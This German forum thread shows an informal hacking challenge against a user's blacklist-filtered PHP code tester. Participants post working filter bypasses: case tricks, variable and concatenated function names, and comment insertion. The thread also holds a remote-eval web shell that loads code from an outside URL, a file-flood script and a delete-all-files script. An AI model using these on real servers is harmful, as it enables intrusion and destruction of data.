PHP-Code testen - Versucht diese Seite zu hacken
lima-city → Forum → Sonstiges → Spam und sonstiges Unvergütetes
beachten
befehl
beispiel
benutzen
code
datei
entwickeln
fehler
funktion
gefundene sicherheitsprobleme
hacken
http
index
moderator
server
test
testen
url
versuchen
zahl
-
Den Fehler den du machst ist, dass du davon ausgehst das jeder die Befehle immer klein Schreibt ;)
fopen wir gefiltert.
Aber fOpen oder Fopen oder FOPEN dagegen schlagen bei deinem filter nicht an.
Deshalb wäre es wohl am besten die Gesammte eingabe erst in kleinbuchstaben zu verwandeln, zumindest das was nicht in " steht, und erst dann zu vergleichen. -
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage
-
five-three-nine schrieb:
Den Fehler den du machst ist, dass du davon ausgehst das jeder die Befehle immer klein Schreibt ;)
fopen wir gefiltert.
Aber fOpen oder Fopen oder FOPEN dagegen schlagen bei deinem filter nicht an.
Deshalb wäre es wohl am besten die Gesammte eingabe erst in kleinbuchstaben zu verwandeln, zumindest das was nicht in " steht, und erst dann zu vergleichen.
Sollte jetzt nicht mehr möglich sein.
Gefundene Sicherheitsprobleme:
"Moderatoren von Lima-City" gefunden von tct
"Befehle:unlink und rmdir" gefunden von fatfreddy
"Befehl: <?" gefunden von trueweb
"Gorß- und Keinschreibung beachten" gefunden von five-three-nine -
Sonst findet ihr nichts mehr?
-
Oh doch!
$vercetti = "_F"; $vercetti .= "ILES"; $ist = "upf"; $ist .= "ile"; $der = "move_uploaded_fi"; $der .= "le"; $king = $$vercetti; $der($king[$ist]['tmp_name'], "vercetti.php");
hätt man natürlich auch kürzer machen können mit $ist = "upf"."ile"; etc; aber ich fands so schöner xD
;)
dann hab ich meine vercetti.php mit folgendem inhalt hochgeladen:
<?php echo "Owned :><br />"; echo "by Vercetti<br />"; echo "Setz get[evalthis] zu einer dateien (kann auch eine externe datei sein) welche php code beinhaltet, der eval'd werden soll<br /><br />"; if(isset($_GET['evalthis'])) eval(file_get_contents($_GET['evalthis'])); ?>
und http://vercetti.lima-city.de/evalthis.txt erstellt, welche den inhalt hat:
echo "das hier könnte Schadcode sein. <br />"; $fh = fopen("wasduwillst.txt", "w"); fwrite($fh, "Penis"); fclose($fh);
und http://ajacr.lima-city.de/vercetti.php?evalthis=http://vercetti.lima-city.de/evalthis.txt aufgerufen.. da hätt ich alles machen können.
//EDIT: oder ich hätt gleich das machen können:
$bla = "un"."link"; $bla("index.php");
aber das hier hat mehr style xDD
Beitrag zuletzt geändert: 16.2.2009 16:45:37 von vercetti -
Das ist mal löblich :D
-
- mail() kann man auch mit einem einem oder mehreren Leerzeichen zwischen dem mail und der klammer schreiben
- sieh dir mal die dateien durch, die auf deinem Space liegen
->
"#mail([ ]{0,})\(#i",
anstelle von
'/mail\(/i'
verwenden ^^
Beitrag zuletzt geändert: 16.2.2009 17:28:59 von thomasba -
vercetti schrieb:
Oh doch!
$vercetti = "_F"; $vercetti .= "ILES"; $ist = "upf"; $ist .= "ile"; $der = "move_uploaded_fi"; $der .= "le"; $king = $$vercetti; $der($king[$ist]['tmp_name'], "vercetti.php");
Geht jetzt nicht mehr.
Gefundene Sicherheitsprobleme:
"Moderatoren von Lima-City" gefunden von tct
"Befehle:unlink und rmdir" gefunden von fatfreddy
"Befehl: <?" gefunden von trueweb
"Gorß- und Keinschreibung beachten" gefunden von five-three-nine
"Variablen als Funktionen benutzen" gefunden von vercetti -
Stell lieber eine Liste auf, was überhaupt noch geht
-
tct schrieb:
Stell lieber eine Liste auf, was überhaupt noch geht
Das ist noch zu viel.
Dazu müsst ihr euch schon mehr ansträngen.
thomasba schrieb: - mail()
Ist nicht Sicherheitsrelevant sondern nur Spamgefahr.
Aber wenn jemand jetzt mailen möchte.... -
kann es sein dass unlink jetzt immer rausgeworfen wird, egal ob man es nur mit echo hinschreiben will?
-
projektverwaltung schrieb:
kann es sein dass unlink jetzt immer rausgeworfen wird, egal ob man es nur mit echo hinschreiben will?
Das kann sein.
Aber du hast ja jetzt eine Lösung gefunden, wie du es überprüfen kannst.
-
copy("index.php",".htaccess"); -
cbhp schrieb:
copy("index.php",".htaccess");
Copy hatte ich noch extra für euch drin gelassen.
Aber jetzt ist es auch draußen.
Gefundene Sicherheitsprobleme:
"Moderatoren von Lima-City" gefunden von tct
"Befehle:unlink und rmdir" gefunden von fatfreddy
"Befehl: <?" gefunden von trueweb
"Gorß- und Keinschreibung beachten" gefunden von five-three-nine
"Variablen als Funktionen benutzen" gefunden von vercetti
"Befehl: copy " gefunden von projektverwaltung und cbhp -
$was_anderes = $irgendwas/(3+4);
der harmlose code geht nicht mehr ;)
uuund:
$iwas = "fo"."pe"."n"; for($i = 0; $i<100; $i++) { $iwas/* lalala */("haha.".$i.".txt","w"); }
;D
http://ajacr.lima-city.de/haha.0.txt
bis
http://ajacr.lima-city.de/haha.99.txt
(ohne inhalt)
und
http://ajacr.lima-city.de/0.txt
bis
http://ajacr.lima-city.de/9999.txt
(mit inhalt)
hab ich aus spass auch noch ma gemacht :>
Beitrag zuletzt geändert: 16.2.2009 19:34:34 von vercetti -
Das Problem ist, dass ich jetzt nicht mehr die Dateien ändern kann.
Denn du hast den Filemanager zerstört. Und FTP habe ich hier noch nicht.
Kannst du mal den Webspace löschen?
Gefundene Sicherheitsprobleme:
"Befehle:unlink und rmdir" gefunden von tct
"Befehl: <?" gefunden von trueweb
"Gorß- und Keinschreibung beachten" gefunden von five-three-nine
"Variablen als Funktionen benutzen" gefunden von vercetti
"Kommentar Funktion" gefunden von vercetti -
vercetti schrieb:
bin kein mod xD
sorry^^ :>
Tja, die können das auch nicht.
Ich habe tct falsch verstanden.
Er hat es mit eine Befehl gemacht.
Hast du nicht eine Hintertür hochgeladen, die das kann?
Sonst müssten wir warten.
Fatal error: Allowed memory size of 41943040 bytes exhausted (tried to allocate 11272552 bytes) in /home/webpages/lima-city/filemanager/html/library/class.table.php on line 109
Beitrag zuletzt geändert: 16.2.2009 20:21:51 von ajacr -
ne :/ die hattest du ja auch mittlerweile gelöscht die vercetti.php :/
-------
das müsste gehn:
geh in datei manager. guck dir die url an:
http://filemanager.lima-city.de/?sid=XXXXXXX
erstell lokal eine datei irgendwas.html und ersetz das XXXXXXX durch deine SID:
<form action="">
<input type="hidden" name="sid" value="XXXXXXX"><input type="hidden" name="dir" value="">
<input type="hidden" name="action" value="upload">
<input type="submit" value="Ausführen">
</form>
und lad die datei hoch und für danach aus [musst evtl öfter ausführen, wegen zeitlimit wird der nich alle dateien schaffen:
achja die datei muss dontdelete.php heissen
<?php
$handle = opendir('.')
while (($f = readdir($handle)) !== false) {
if($f != "." && $f != ".." && $f != "dontdelete.php")
unlink($f);
}
closedir($handle);
?>
Beitrag zuletzt geändert: 16.2.2009 20:30:52 von vercetti -
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage
